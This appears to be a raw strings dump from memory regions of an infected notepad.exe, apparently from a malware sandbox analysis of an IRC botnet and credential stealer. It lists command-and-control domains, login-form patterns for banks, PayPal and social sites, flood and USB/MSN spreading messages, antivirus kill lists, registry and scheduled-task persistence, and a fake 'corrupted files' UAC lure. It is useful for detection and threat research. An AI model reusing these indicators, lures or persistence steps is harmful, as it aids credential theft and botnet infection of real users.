%SystemRoot%\system32\SHELL32.dll
%s\c731200
%s\%s
%s\%s.lnk
Windows_Shared_Mutex_231_c000100
ntdll.dll
\ScreenSaverPro.scr
\temp.bin
user32.dll
advapi32.dll
shell32.dll
urlmon.dll
wininet.dll
gdi32.dll
rpcrt4.dll
netapi32.dll
*.exe
.gonewiththewings
*.gonewiththewings
WinExec
URLDownloadToFileA
hXXp://VVV.google.com
\calc.exe
\Reader_sl.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
notepad.exe
\notepad.exe
\svchost.exe
WindowsId
Identities\%s
%s\%s\%s.exe
:Zone.Identifier
.quarantined
"%s" -shell
"%s" -bind
userinit.exe
explorer.exe
Windows critical error, require reboot
Windows Update
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
a.aiphon1egalaxyblack42.com
a.ajjjqws1fkxx42.com
a.adoyou1understandme42.com
a.amous1epadsafa42.com
a.acaraka1lagroup42.com
a.aire1bobohayawen42.com
a.ajhvdqw1ladies42.com
a.biphon2egalaxyblack42.com
a.bmous2epadsafa42.com
a.bcaraka2lagroup42.com
a.anabok1hasn1aser42.com
a.athemall1gonowhaha42.com
a.bdoyou2understandme42.com
a.bnabok2hasn1aser42.com
a.bjjjqws2fkxx42.com
a.bjhvdqw2ladies42.com
a.bthemall2gonowhaha42.com
a.bire2bobohayawen42.com
a.cdoyou3understandme42.com
a.cmous3epadsafa42.com
a.dmous4epadsafa42.com
a.ciphon3egalaxyblack42.com
a.cnabok3hasn1aser42.com
a.cire3bobohayawen42.com
a.cthemall3gonowhaha42.com
a.cjhvdqw3ladies42.com
a.cjjjqws3fkxx42.com
a.ccaraka3lagroup42.com
a.diphon4egalaxyblack42.com
a.ddoyou4understandme42.com
a.dnabok4hasn1aser42.com
a.dire4bobohayawen42.com
a.djjjqws4fkxx42.com
a.djhvdqw4ladies42.com
a.dthemall4gonowhaha42.com
a.edoyou5understandme42.com
a.dcaraka4lagroup42.com
a.emous5epadsafa42.com
a.ecaraka5lagroup42.com
a.eiphon5egalaxyblack42.com
a.enabok5hasn1aser42.com
a.eire5bobohayawen42.com
a.ejjjqws5fkxx42.com
a.ejhvdqw5ladies42.com
a.ethemall5gonowhaha42.com
a.roooggeyyy2.com
a.roooggeyyy3.com
a.roooggeyyy4.com
a.so1aa00.com
a.saao20000.com
GetProcessHeap
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyA
RegEnumKeyA
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
SetTcpEntry
SHLWAPI.dll
RPCRT4.dll
NETAPI32.dll
DNSAPI.dll
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\WindowsId Manager Reader
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
WindowsMark
m1xg.org
mxxtxxt.biz
meob.me
%System%\notepad.exe
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0A
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
%s_%d
-%sMutex
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
URLDownloadToFileW
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
Secur32.dll
ShellExecuteA
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
WS2_32.dll
MSVCRT.dll
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
RegNotifyChangeKeyValue
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
7 767<7~7
8*808;8~8
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
shlwapi.dll
crypt32.dll
wtsapi32.dll
samcli.dll
netutils.dll
userenv.dll
WindowsSecondaryDesktop
\charmap.exe
\Windows Media Player\wmprph.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
Aadvapi32.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

notepad.exe_1608_rwx_008B0000_00027000:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
PSSVSSh
RPVSSh
PSSh(
PSSh#
PSSh'
PSSh&
PSSh*
9p.uV

notepad.exe_1608_rwx_008D8000_0006B000:

Opera/9.00 (Windows NT 5.1; U; en)
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)
Opera 9.4 (Windows NT 6.1; U; en)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)
SbieDll.dll
Software\Classes\CLSID\%s\X
Software\Classes\CLSID\%s\X\%s
0xX
SB:0xX
G:%s_0xX_%c:%s_v1$
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
IEXPLORE.EXE
IE.HTTP
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTPS
SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
HTTP\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s
Psapi.dll
%s\%s
Software\Adobe\Acrobat Reader\%s\Privileged
mscoree.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\%u
SOFTWARE\Microsoft\Windows NT\CurrentVersion
nspr4.dll
nss3.dll
Urlmon.dll
URLDownloadToFileW
Netapi32.dll
76487-640-1457236-23837
76487-337-8429955-22614
76487-644-3177037-23510
76497-640-6308873-23835
55274-640-2673064-23950
76487-640-8834005-23195
76487-640-0716662-23535
76487-644-8648466-23106
00426-293-8170032-85146
76487-341-5883812-22420
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup
{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}
snxhk.dll
comctl32.dll
ZwSetValueKey
ZwDeleteValueKey
SOFTWARE\%s
update.microsoft.com
microsoft.com
windowsupdate.microsoft.com
JOIN
PRIVMSG
.rdata
cmd_option.%s
/c %s
cmd.exe
msvcrt.dll
--x-x-x-xx
Content-Type: multipart/form-data; boundary=x-x-x-xx
Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"
%s?action=up&g=%s
xul.dll
<Port>
<Pass>
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
?pid=%d
?page=%d
?id=%u
%s=%u&%s=%s
%s=%s&%s=%u
&%s=%s
&%s%u=
&%s%hu=
&%s=_%u
%d|%s|%s|%s
.info
httpget
GET /%s HTTP/1.1
Host: %s
Content-Length: %d
Accept: %s
Accept-Language: %s
Accept-Charset: %s
Accept-Encoding: %s
User-Agent: %s
Referer: %s
Connection: %s
hXXp://
iexplore.exe
firefox.exe
tbb-firefox.exe
%s:%hu
windowsupdate
SSH2_MSG_KEXINIT
SSH2_MSG_DISCONNECT
SSH2_MSG_USERAUTH_SUCCESS
hXXp://%s%s/image.php?id=%s
TaskDialogIndirect
hXXp://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535
ÐxX
ntdll.dll
kernel32.dll
secur32.dll
crypt32.dll
user32.dll
advapi32.dll
wininet.dll
shell32.dll
shlwapi.dll
ole32.dll
version.dll
sfc.dll
dnsapi.dll
ws2_32.dll
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
8"808]9|9
9%9 919<9
=(=/=6==={=
4 4?4^4}4
6o6g6r6w6
9 9$9(90949
.text
`.rdata
@.data
.rsrc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
Invalid parameter passed to C runtime function.
GetProcessWindowStation
USER32.DLL
RegSetKeySecurity
RegEnumKeyA
ADVAPI32.dll
GDI32.dll
GetNamedPipeHandleStateA
CreateIoCompletionPort
DisconnectNamedPipe
GetNamedPipeInfo
PeekNamedPipe
GetProcessHeap
SetProcessShutdownParameters
GetCPInfo
KERNEL32.dll
.EGDF
-TQ}9J3
l.Bt.,
Y%U(q
>.Rm4xon}V^
jdB .toN@&
#)CM%D
qu.kP
{-Qn}-
 %Fj 7
o!L.Zy
.mvry
Ryx.ps
n}.cK
{ww%f
%c;sk
h%S4m
.FdT=
Software\Classes\CLSID\%S
G:%S_0xX
chrome.exe
opera.exe
safari.exe
maxthon.exe
:Mozilla\Firefox\Profiles
cookies.sqlite
%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*
%s\winsxs\%s\comctl32.dll
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s
%s:*:Enabled
avcuf32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
prstrui.exe
Windows Defender
MpClient.dll
Windows Defender\MSASCui.exe
MpSvc.dll
msseces.exe
MsMpEng.exe
MSASCui.exe
MpAsDesc.dll
MsMpLics.dll
avgui.exe
avgidsagent.exe
avgwdsvc.exe
avgdiagex.exe
avgmfapx.exe
avgupd.exe
avgcfgex.exe
avgnt.exe
avguard.exe
avshadow.exe
avcenter.exe
update.dll
updaterc.dll
usrreq.exe
ccsvchst.exe
symerr.exe
NIS.exe
NAV.exe
navw32.exe
avastui.exe
AvastEmUpdate.exe
ashUpd.exe
WRSA.exe
zatray.exe
ForceField.exe
updating.dll
fshoster32.exe
fsaua.dll
PSUNMain.exe
PSUAService.exe
PSANHost.exe
PSUNScan.dll
epavjobs.exe
AVENGINE.exe
Upgrader.exe
adaware.exe
BullGuard.exe.manifest
BullGuardUpdate.exe
BullGuard.exe
BullGuardScanner.exe
BullGuardBhvScanner.exe
BullGuardUpdate2.exe
BgScan.exe
BgScanEngine.dll
.manifest
updater.exe
Backup\RSD\RSSetup\updater.exe
RsTray.exe
RavMonD.exe
RsMgrSvc.exe
rsmain.exe
RsScan.dll
RsTray.dll
mbamgui.exe
mbam.exe
pctsGui.exe
pctsAuxs.exe
pctsSvc.exe
Update.exe
UpdateHlpr.dll
Definitions\vcore.dll
sbamui.exe
SBAMTray.exe
updater_client_mod.dll
FProtTray.exe
FPWin.exe
scf.dat
ALUpdate.exe
update_tmp.exe
arcaclean.exe
BavUpdater.exe
rcfp.exe
CLPSLA.exe
op_mon.exe
niu.exe
K7TSUpdT.exe
sguardxup.exe
ccupdate.exe
caupdate.dll
a2guard.exe
a2start.exe
a2service.exe
AVKTray.exe
GDSC.exe
AVK.exe
GDFirewallTray.exe
Bka.exe
BLuPro.exe
BkavSystemServer.exe
BkavService.exe
LiveUpdate.dll
LiveConnect.dll
BaseFile\Bkav\LiveUpdate.dll
V3Lite.exe
ASDSvc.exe
autoup.exe
downloader.exe
%s.config
updatesrv.exe
updatemgr.dll
egui.exe
ekrn.exe
x86\ekrn.exe
uWinMgr.exe
coreServiceShell.exe
uiSeAgnt.exe
uiWatchDog.exe
plugins\plugUpdater.dll
UiFrmwrk\uiUpdateTray.exe
coreFrameworkHost.exe
mcagent.exe
McSvHost.exe
McUICnt.exe
McPvTray.exe
mcui_exe
mcpltui_exe
mcshell.exe
mcupdmgr.exe
mcupdate.exe
mcshield.exe
mcupdui.dll
McAPExe.exe
.config
Image File Execution Options\%s
SYSTEM\CurrentControlSet\services\%s
%c:\ntusbdriver.sys
%c:\*p.exe
%c:\%s
p.exe
%WinDir%\explorer.exe
/C start /d. %s&"%s"
%COMSPEC%
%WinDir%\system32\shell32.dll
%c:\%s.lnk
VisthAux.exe
explorer.exe
t.minecraft
Works! PID: %d, Name: %s
cmdvirth
%s%s\X
tcp://
svchost.exe
csrss.exe
lsass.exe
smss.exe
wscript.exe
cscript.exe
vbc.exe
rundll32.exe
regsvr32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
winlogon.exe
services.exe
%s\x.lnk
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s
desktop.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
wintrust.dll
chrome.dll
Applications\iexplore.exe\shell\open\command
%s_xx
x.zip
Navw32.exe
SysInspector.exe
avscan.exe
mfefire.exe
wuauclt.exe
WerFault.exe
lFileZilla\sitemanager.xml
port
Sites.dat
Quick.dat
%s\3\%s
%s\4\%s
spoolsv.exe
steam.exe
skype.exe
origin.exe
dwm.exe
tapi3.dll
/C copy "%s" "%s"
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Windows Update Service
"%s" /%s
Software\Microsoft\Windows\CurrentVersion\RunOnce
/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST
schtasks.exe
/DELETE /TN "Windows Update Check - 0xX" /F
\Windows\Explorer.exe
Low_X
%s.manifest
PendingFileRenameOperations
%s\X
Windows\CurrentVersion\Run
CurrentVersion\Windows
Windows NT\CurrentVersion\Image File Execution Options\%s
Windows has encountered a corrupted folder on your hard drive
Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.
Corrupted folder: %s
Corrupted file count: %d
<a href=".ms">%s</a>
/c start "" "%s" /%s "%s"
shell32,ShellExec_RunDLL "%s" /%s "%s"
You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.
Windows 3.1 Update Service
%s:Zone.Identifier
%s\X.pif
KERNEL32.DLL
KERNELBASE.DLL
ekernel32.dll
kernelbase.dll
Website Copier [Offline Browser]
WinHTTrack Website Copier, Copy Websites to Your Computer
3.47.21
WinHTTrack.exe
WinHTTrack Website Copier

notepad.exe_1608_rwx_00950000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\notepad.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\notepad.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

